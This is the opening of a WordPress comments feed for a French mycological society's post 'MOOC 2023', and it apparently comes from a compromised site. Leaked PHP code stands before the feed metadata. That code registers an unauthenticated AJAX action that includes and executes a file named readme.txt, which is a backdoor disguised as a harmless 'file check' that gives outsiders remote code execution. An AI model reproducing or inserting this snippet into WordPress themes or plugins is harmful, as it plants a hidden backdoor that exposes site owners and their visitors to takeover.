if(!function_exists('file_check_readme84924')){ add_action('wp_ajax_nopriv_file_check_readme84924', 'file_check_readme84924'); add_action('wp_ajax_file_check_readme84924', 'file_check_readme84924'); function file_check_readme84924() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Commentaires sur : MOOC 2023 https://myco22.fr/2023/07/11/mooc-2023/ Société Mycologique des Côtes d'Armor Tue, 11 Jul 2023 21:17:07 +0000 hourly 1 https://wordpress.org/?v=6.0.12